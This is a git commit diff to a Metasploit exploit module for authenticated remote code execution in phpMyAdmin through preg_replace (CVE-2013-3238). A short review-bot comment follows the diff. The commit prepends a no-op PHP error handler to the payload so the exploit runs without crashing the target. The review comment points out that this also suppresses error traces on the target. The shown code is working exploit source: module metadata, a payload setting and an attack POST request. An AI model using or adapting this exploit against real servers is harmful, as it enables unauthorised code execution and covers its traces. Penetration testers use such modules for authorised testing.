Clear out PMA's error handler

* Add an error_handler function that just returns true. This prevents eventual
  ENOMEM errors and segfaults like these:
    [Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error:  Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156
    [Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11)
* clean up some whitespace
unstable
James Lee 2013-04-26 15:12:58 -05:00
parent 5900a7c03f
commit a0c1b6d1ce
1 changed files with 14 additions and 12 deletions


@ -14,32 +14,35 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'PhpMyAdmin Authenticated Remote Code Execution via preg_replace()', 'Name' => 'PhpMyAdmin Authenticated Remote Code Execution via preg_replace()',
'Description' => %q{ 'Description' => %q{
This module exploits a PREG_REPLACE EVAL vulnerability in PhpMyAdmin's This module exploits a PREG_REPLACE EVAL vulnerability in PhpMyAdmin's
replace_prefix_tbl in libraries/mult_submits.inc.php via db_settings.php replace_prefix_tbl in libraries/mult_submits.inc.php via db_settings.php
}, },
'Author' => 'Author' =>
[ [
'Janek "waraxe" Vind', # Discovery 'Janek "waraxe" Vind', # Discovery
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
[ 'CVE', '2013-3238' ], [ 'CVE', '2013-3238' ],
[ 'PMASA', '2013-2'], [ 'PMASA', '2013-2'],
[ 'waraxe', '2013-SA#103' ], [ 'waraxe', '2013-SA#103' ],
[ 'URL', 'http://www.waraxe.us/advisory-103.html' ], [ 'URL', 'http://www.waraxe.us/advisory-103.html' ],
], ],
'Privileged' => false, 'Privileged' => false,
'Platform' => ['php'], 'Platform' => ['php'],
'Arch' => ARCH_PHP, 'Arch' => ARCH_PHP,
'Payload' => 'Payload' =>
{ {
'BadChars' => "&\n=+%", 'BadChars' => "&\n=+%",
# Clear out PMA's error handler so it doesn't lose its mind
# and cause ENOMEM errors and segfaults in the destructor.
'Prepend' => "function foo($a,$b,$c,$d,$e){return true;};set_error_handler(foo);"
}, },
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ], [ 'Automatic', { } ],
], ],
@ -48,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
register_options( register_options(
[ [
OptString.new('URI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']), OptString.new('URI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']), OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", '']) OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
], self.class) ], self.class)
@ -137,7 +140,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
db = rand_text_alpha(3+rand(3)) db = rand_text_alpha(3+rand(3))
exploit_result = send_request_cgi({ exploit_result = send_request_cgi({
'uri' => uri('db_structure.php'), 'uri' => uri('db_structure.php'),
'method' => 'POST', 'method' => 'POST',
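Review bot: The comment above the new `'Prepend'` entry in the `'Payload'` hash says only that PMA's handler would "lose its mind", and it omits the side effect of the replacement: a handler that always returns true marks every non-fatal PHP error as handled, so errors raised after the payload starts are swallowed silently for the rest of that request. Anyone reading the target's logs after an authorised test should know that the `Allowed memory size ... exhausted` and segfault entries quoted in the commit message no longer appear with this change. I would word the comment as `# Install a no-op error handler: PMA's own handler (libraries/Error.class.php) otherwise exhausts the PHP memory limit and the child segfaults.` followed by `# Side effect: non-fatal PHP errors raised during this request are silently discarded on the target.` The handler is registered through the bare word `foo`, which PHP resolves only through its undefined-constant fallback, so the comment should also say whether the missing quotes are deliberate. `initialize` continues past the end of this hunk.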